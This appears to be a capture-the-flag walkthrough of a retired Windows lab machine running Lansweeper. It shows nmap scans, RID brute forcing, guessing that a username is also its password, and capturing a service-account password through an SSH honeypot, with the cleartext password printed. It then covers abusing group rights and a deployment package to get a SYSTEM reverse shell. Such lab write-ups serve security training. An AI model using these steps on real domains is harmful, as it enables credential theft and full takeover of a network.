Skip to content

Sweep

Box details
OS Windows
Difficulty Medium
Status Retired
Release September 2025
Completed October 2025

Enumeration

Nmap port scan of the target host:

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
$ nmap -sV -sC -p- -PN -oA sweep_nmap 10.129.234.177
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-30 23:12 CEST
Nmap scan report for 10.129.234.177
Host is up (0.077s latency).
Not shown: 65511 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
81/tcp    open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-title: Lansweeper - Login
|_Requested resource was /login.aspx
82/tcp    open  ssl/http      Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| tls-alpn:
|_  http/1.1
|_ssl-date: TLS randomness does not represent time
| http-title: Lansweeper - Login
|_Requested resource was /login.aspx
| ssl-cert: Subject: commonName=Lansweeper Secure Website
| Subject Alternative Name: DNS:localhost, DNS:localhost, DNS:localhost
| Not valid before: 2021-11-21T09:22:27
|_Not valid after:  2121-12-21T09:22:27
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-09-30 21:16:27Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: sweep.vl0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: sweep.vl0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
|   Target_Name: SWEEP
|   NetBIOS_Domain_Name: SWEEP
|   NetBIOS_Computer_Name: INVENTORY
|   DNS_Domain_Name: sweep.vl
|   DNS_Computer_Name: inventory.sweep.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2025-09-30T21:18:38+00:00
| ssl-cert: Subject: commonName=inventory.sweep.vl
| Not valid before: 2025-07-27T23:26:33
|_Not valid after:  2026-01-26T23:26:33
|_ssl-date: 2025-09-30T21:19:09+00:00; +9s from scanner time.
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        .NET Message Framing
9524/tcp  open  ssl/unknown
|_ssl-date: 2025-09-30T21:19:09+00:00; +9s from scanner time.
| ssl-cert: Subject: commonName=lansweeper-server-communication
| Subject Alternative Name: DNS:localhost, DNS:INVENTORY, DNS:inventory.sweep.vl, IP Address:192.168.115.145
| Not valid before: 2024-02-08T19:51:08
|_Not valid after:  3024-02-08T19:51:08
| tls-alpn:
|   h2
|_  http/1.1
| fingerprint-strings:
|   FourOhFourRequest:
|     HTTP/1.1 404 Not Found
|     Content-Length: 0
|     Connection: close
|     Date: Tue, 30 Sep 2025 21:17:27 GMT
|     Server: Kestrel
|   GetRequest:
|     HTTP/1.1 200 OK
|     Content-Length: 1
|     Connection: close
|     Content-Type: text/html
|     Date: Tue, 30 Sep 2025 21:16:55 GMT
|     Server: Kestrel
|     api-supported-versions: 1.0
|   HTTPOptions:
|     HTTP/1.1 405 Method Not Allowed
|     Content-Length: 0
|     Connection: close
|     Date: Tue, 30 Sep 2025 21:16:56 GMT
|     Server: Kestrel
|     Allow: GET
|   Help, SSLSessionReq:
|     HTTP/1.1 400 Bad Request
|     Content-Length: 0
|     Connection: close
|     Date: Tue, 30 Sep 2025 21:17:13 GMT
|     Server: Kestrel
|   Kerberos:
|     HTTP/1.1 400 Bad Request
|     Content-Length: 0
|     Connection: close
|     Date: Tue, 30 Sep 2025 21:17:16 GMT
|     Server: Kestrel
|   LDAPSearchReq, LPDString:
|     HTTP/1.1 400 Bad Request
|     Content-Length: 0
|     Connection: close
|     Date: Tue, 30 Sep 2025 21:17:28 GMT
|     Server: Kestrel
|   RTSPRequest:
|     HTTP/1.1 505 HTTP Version Not Supported
|     Content-Length: 0
|     Connection: close
|     Date: Tue, 30 Sep 2025 21:16:56 GMT
|     Server: Kestrel
|   TLSSessionReq, TerminalServerCookie:
|     HTTP/1.1 400 Bad Request
|     Content-Length: 0
|     Connection: close
|     Date: Tue, 30 Sep 2025 21:17:15 GMT
|_    Server: Kestrel
49664/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
50238/tcp open  msrpc         Microsoft Windows RPC
50250/tcp open  msrpc         Microsoft Windows RPC
60441/tcp open  msrpc         Microsoft Windows RPC
63497/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
63498/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: INVENTORY; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 8s, deviation: 0s, median: 8s
| smb2-time:
|   date: 2025-09-30T21:18:30
|_  start_date: N/A
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required

Port 53/UDP is also open.

There are a few ports of interest:

  • 81: A login page for a Lansweeper instance served over HTTP.
  • 82: HTTPS version of the same login page as above
  • 9524: Scanning port used by Lansweeper scanning agents over HTTPS

The Nmap scan also found the DNS domain name, sweep.vl, and the computer name, inventory.sweep.vl.

The login page on port 81/82 offers the choice between logging in using Windows credentials or as a built-in administrator account:

alt text

Nothing on the page or in the page source gives any hints on which version of Lansweeper is in use.

The SMB server is configured for anonymous access. The following shares are available:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
$ nxc smb 10.129.234.177 -u guest -p '' --shares
SMB         10.129.234.177  445    INVENTORY        [*] Windows Server 2022 Build 20348 x64 (name:INVENTORY) (domain:sweep.vl) (signing:True) (SMBv1:False)
SMB         10.129.234.177  445    INVENTORY        [+] sweep.vl\guest:
SMB         10.129.234.177  445    INVENTORY        [*] Enumerated shares
SMB         10.129.234.177  445    INVENTORY        Share           Permissions     Remark
SMB         10.129.234.177  445    INVENTORY        -----           -----------     ------
SMB         10.129.234.177  445    INVENTORY        ADMIN$                          Remote Admin
SMB         10.129.234.177  445    INVENTORY        C$                              Default share
SMB         10.129.234.177  445    INVENTORY        DefaultPackageShare$ READ            Lansweeper PackageShare
SMB         10.129.234.177  445    INVENTORY        IPC$            READ            Remote IPC
SMB         10.129.234.177  445    INVENTORY        Lansweeper$                     Lansweeper Actions
SMB         10.129.234.177  445    INVENTORY        NETLOGON                        Logon server share
SMB         10.129.234.177  445    INVENTORY        SYSVOL                          Logon server share

The shares DefaultPackageShare$ and Lansweeper$ stand out. Of the two, only the DefaultPackageShare$ share is readable, with the following contents:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
$ smbclient -N  //sweep.vl/DefaultPackageShare$
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu Feb  8 20:46:04 2024
  ..                                  D        0  Thu Feb  8 20:47:44 2024
  Images                              D        0  Thu Feb  8 20:46:08 2024
  Installers                          D        0  Thu Feb  8 20:46:04 2024
  Scripts                             D        0  Thu Feb  8 20:46:08 2024

                5048575 blocks of size 4096. 992684 blocks available
smb: \> ls Scripts/
  .                                   D        0  Thu Feb  8 20:46:08 2024
  ..                                  D        0  Thu Feb  8 20:46:04 2024
  CmpDesc.vbs                         A     1119  Tue Jan 30 02:47:08 2024
  CopyFile.vbs                        A      728  Tue Jan 30 02:47:08 2024
  Wallpaper.vbs                       A     1245  Tue Jan 30 02:47:08 2024

                5048575 blocks of size 4096. 992684 blocks available

Except for a JPG file in Images and the above Visual Basic scripts, there is nothing else on the share.

Having guest access to SMB allows for enumerating domain users by RID brute forcing. Relative Identifiers (RIDs) are identifiers unique to a domain. Unlike the globally unique Security Identifiers (SIDs), the range of possile RIDs is much more limited and feasible for brute forcing.

RID brute forcing can be performed with NetExec:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
$ nxc smb 10.129.54.96 -u Guest -p '' --rid-brute
SMB         10.129.54.96    445    INVENTORY        [*] Windows Server 2022 Build 20348 x64 (name:INVENTORY) (domain:sweep.vl) (signing:True) (SMBv1:False)
SMB         10.129.54.96    445    INVENTORY        [+] sweep.vl\Guest:
SMB         10.129.54.96    445    INVENTORY        498: SWEEP\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         10.129.54.96    445    INVENTORY        500: SWEEP\Administrator (SidTypeUser)
SMB         10.129.54.96    445    INVENTORY        501: SWEEP\Guest (SidTypeUser)
SMB         10.129.54.96    445    INVENTORY        502: SWEEP\krbtgt (SidTypeUser)
SMB         10.129.54.96    445    INVENTORY        512: SWEEP\Domain Admins (SidTypeGroup)
SMB         10.129.54.96    445    INVENTORY        513: SWEEP\Domain Users (SidTypeGroup)
SMB         10.129.54.96    445    INVENTORY        514: SWEEP\Domain Guests (SidTypeGroup)
SMB         10.129.54.96    445    INVENTORY        515: SWEEP\Domain Computers (SidTypeGroup)
SMB         10.129.54.96    445    INVENTORY        516: SWEEP\Domain Controllers (SidTypeGroup)
SMB         10.129.54.96    445    INVENTORY        517: SWEEP\Cert Publishers (SidTypeAlias)
SMB         10.129.54.96    445    INVENTORY        518: SWEEP\Schema Admins (SidTypeGroup)
SMB         10.129.54.96    445    INVENTORY        519: SWEEP\Enterprise Admins (SidTypeGroup)
SMB         10.129.54.96    445    INVENTORY        520: SWEEP\Group Policy Creator Owners (SidTypeGroup)
SMB         10.129.54.96    445    INVENTORY        521: SWEEP\Read-only Domain Controllers (SidTypeGroup)
SMB         10.129.54.96    445    INVENTORY        522: SWEEP\Cloneable Domain Controllers (SidTypeGroup)
SMB         10.129.54.96    445    INVENTORY        525: SWEEP\Protected Users (SidTypeGroup)
SMB         10.129.54.96    445    INVENTORY        526: SWEEP\Key Admins (SidTypeGroup)
SMB         10.129.54.96    445    INVENTORY        527: SWEEP\Enterprise Key Admins (SidTypeGroup)
SMB         10.129.54.96    445    INVENTORY        553: SWEEP\RAS and IAS Servers (SidTypeAlias)
SMB         10.129.54.96    445    INVENTORY        571: SWEEP\Allowed RODC Password Replication Group (SidTypeAlias)
SMB         10.129.54.96    445    INVENTORY        572: SWEEP\Denied RODC Password Replication Group (SidTypeAlias)
SMB         10.129.54.96    445    INVENTORY        1000: SWEEP\INVENTORY$ (SidTypeUser)
SMB         10.129.54.96    445    INVENTORY        1101: SWEEP\DnsAdmins (SidTypeAlias)
SMB         10.129.54.96    445    INVENTORY        1102: SWEEP\DnsUpdateProxy (SidTypeGroup)
SMB         10.129.54.96    445    INVENTORY        1103: SWEEP\Lansweeper Admins (SidTypeGroup)
SMB         10.129.54.96    445    INVENTORY        1113: SWEEP\jgre808 (SidTypeUser)
SMB         10.129.54.96    445    INVENTORY        1114: SWEEP\bcla614 (SidTypeUser)
SMB         10.129.54.96    445    INVENTORY        1115: SWEEP\hmar648 (SidTypeUser)
SMB         10.129.54.96    445    INVENTORY        1116: SWEEP\jgar931 (SidTypeUser)
SMB         10.129.54.96    445    INVENTORY        1117: SWEEP\fcla801 (SidTypeUser)
SMB         10.129.54.96    445    INVENTORY        1118: SWEEP\jwil197 (SidTypeUser)
SMB         10.129.54.96    445    INVENTORY        1119: SWEEP\grob171 (SidTypeUser)
SMB         10.129.54.96    445    INVENTORY        1120: SWEEP\fdav736 (SidTypeUser)
SMB         10.129.54.96    445    INVENTORY        1121: SWEEP\jsmi791 (SidTypeUser)
SMB         10.129.54.96    445    INVENTORY        1122: SWEEP\hjoh690 (SidTypeUser)
SMB         10.129.54.96    445    INVENTORY        1123: SWEEP\svc_inventory_win (SidTypeUser)
SMB         10.129.54.96    445    INVENTORY        1124: SWEEP\svc_inventory_lnx (SidTypeUser)
SMB         10.129.54.96    445    INVENTORY        1125: SWEEP\intern (SidTypeUser)
SMB         10.129.54.96    445    INVENTORY        3101: SWEEP\Lansweeper Discovery (SidTypeGroup)

The domain username policy isn't immediately obvious, as it appears to consist of four letters and three numbers. One username (intern) doesn't adhere to this policy and immediately stands out. If any of the accounts have a weak password, it's likely to be this account. As a wild guess, this account may even be using the account name as their password.

Attempting to log in to the Lansweeper UI with the credentials intern:intern works:

alt text

Tip

Another way of testing credentials where the password matches the username is with NetExec:

1
2
3
4
5
6
7
$ nxc smb 10.129.54.96 -u users.txt -p users.txt --no-bruteforce --continue-on-success
SMB         10.129.54.96    445    INVENTORY        [*] Windows Server 2022 Build 20348 x64 (name:INVENTORY) (domain:sweep.vl) (signing:True) (SMBv1:False)
SMB         10.129.54.96    445    INVENTORY        [-] sweep.vl\jgre808:jgre808 STATUS_LOGON_FAILURE
...
SMB         10.129.54.96    445    INVENTORY        [-] sweep.vl\svc_inventory_win:svc_inventory_win STATUS_LOGON_FAILURE
SMB         10.129.54.96    445    INVENTORY        [-] sweep.vl\svc_inventory_lnx:svc_inventory_lnx STATUS_LOGON_FAILURE
SMB         10.129.54.96    445    INVENTORY        [+] sweep.vl\intern:intern

The target is running Lansweper 11.1.6.0. There are no known vulnerabilities for this version.

With credentialed access to the target, the rest of the domain can be enumerated as well. The obvious choice for this is by using BloodHound.

Data is collected with the bloodhound-python ingestor:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
$ bloodhound-python -u intern -p 'intern' -ns 10.129.54.96 -d sweep.vl -c all
INFO: Found AD domain: sweep.vl
INFO: Getting TGT for user
INFO: Connecting to LDAP server: inventory.sweep.vl
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: inventory.sweep.vl
INFO: Found 17 users
INFO: Found 54 groups
INFO: Found 2 gpos
INFO: Found 3 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: inventory.sweep.vl
INFO: Done in 00M 07S

Enumerating the intern user in BloodHound didn't turn up anything of value.

Foothold

There is a lot of built-in functionality in Lansweeper that could be abused for privilege escalation, but none of Basic actions listed in the asset profile page for inventory.sweep.vl are available:

alt text

Another Lansweeper feature is target scanning. Again, there are a lot of options available, one of which is Scanning credentials which uses stored credentials for accessing targets. The key here is that the credentials aren't restricted to targets managed by Lansweeper, and can be used for authenticating to any target Lansweeper has network access to, including the attack host. If the password can be captured, it might provide access to a higher privileged service account than the current intern user.

A scan can be created from the Scanning targets page in the Scanning menu. From there, a new scan with the attack host as target is stood up as shown below:

alt text

Note

The SSH port is set to a non-standard port on purpose.

Stored credentials can be mapped to the scan by navigating to Scanning credentials. The list of credentials includes two service accounts, one for Linux and one for Windows:

alt text

The Linux credentials are for SSH, which means an SSH honeypot like ssheasame is needed to be able to capture them.

With the honeypot up, it takes a few minutes from the scan is triggered until Lansweeper attempts to connect:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
$ ./sshesame -config sshesame.yaml
INFO 2025/10/02 20:02:42 No host keys configured, using keys at "/home/admin/.local/share/sshesame"
INFO 2025/10/02 20:02:42 Listening on [::]:9001
2025/10/02 20:05:51 [10.129.54.96:58968] authentication for user "svc_inventory_lnx" without credentials rejected
2025/10/02 20:05:51 [10.129.54.96:58968] authentication for user "svc_inventory_lnx" with password "0|5m-U6?/uAX" accepted
2025/10/02 20:05:51 [10.129.54.96:58968] connection with client version "SSH-2.0-RebexSSH_5.0.8372.0" established
2025/10/02 20:05:51 [10.129.54.96:58968] [channel 0] session requested
2025/10/02 20:05:51 [10.129.54.96:58968] [channel 0] PTY using terminal "xterm" (size 80x25) requested
2025/10/02 20:05:51 [10.129.54.96:58968] [channel 0] shell requested
2025/10/02 20:05:51 [10.129.54.96:58968] [channel 0] input: "smclp"
2025/10/02 20:05:51 [10.129.54.96:58968] [channel 0] input: "show system1"
WARNING 2025/10/02 20:06:01 Error sending CRLF: EOF
2025/10/02 20:06:01 [10.129.54.96:58968] [channel 0] closed
2025/10/02 20:06:01 [10.129.54.96:58968] connection closed

Going back to BloodHound and running a Group Delegated Object Control query on svc_inventory_lnx reveals that this user has GenericAll rights over the Lansweeper Admins group:

alt text

This right can be used to add new members to the group. This is valuable, as group members have CanPSRemote (WinRM) access to inventory.sweep.vl:

alt text

Note

There is no predefined query in BloodHound for enumerating users with WinRM access, but this can be enumerated using the following raw Cypher queries instead:

Find users with WinRM rights:

1
MATCH p1=shortestPath((u1:User)-[r1:MemberOf*1..]->(g1:Group)) MATCH p2=(u1)-[:CanPSRemote*1..]->(c:Computer) RETURN p2

Find groups with WinRM rights:

1
MATCH p2=(u1)-[:CanPSRemote*1..]->(c:Computer) RETURN p2

There are a few ways of adding a user to a remote group over SMB. From a Linux attack host, the easiest way is to use net rpc:

1
2
3
4
$ net rpc group addmem 'Lansweeper Admins' 'intern' -U 'sweep.vl/svc_inventory_lnx%0|5m-U6?/uAX' -S 10.129.54.96
$ net rpc group members 'Lansweeper Admins' -U 'sweep.vl/svc_inventory_lnx%0|5m-U6?/uAX' -S 10.129.54.96
SWEEP\jgre808
SWEEP\intern

As a member of Lansweeper Admins, intern can access the target using Evil-WinRM.

Got the user flag.

Privilege Escalation (Administrator)

In addition to the WinRM rights, Lansweeper Admins members also have additional rights in the Lansweeper UI. In particular this includes permission for deploying packages, which is Lansweeper's terminology for running custom commands and scripts on targets. Abusing this is straight forward. By creating a deployment package with a reverse shell, Lansweeper will connect back to the attack host once the deployment is triggered.

A custom deployment package for is created by navigating to DeploymentNew package. From there, details for the deployment are filled out as follows:

alt text

In order to deploy the package, it needs to be associated with credentials for the target it's supposed to run on. The obvious choice in this case are the credentials for svc_inventory_win.

Mapping the credentials to the deployment and triggering the it returned a reverse shell in a Netcat listener on the attack host as NT AUTHORITY\SYSTEM:

1
2
3
4
5
6
$ nc -lnvp 9002
Listening on 0.0.0.0 9002
Connection received on 10.129.54.96 59477

PS C:\Windows\system32> whoami
nt authority\system

Got the root flag.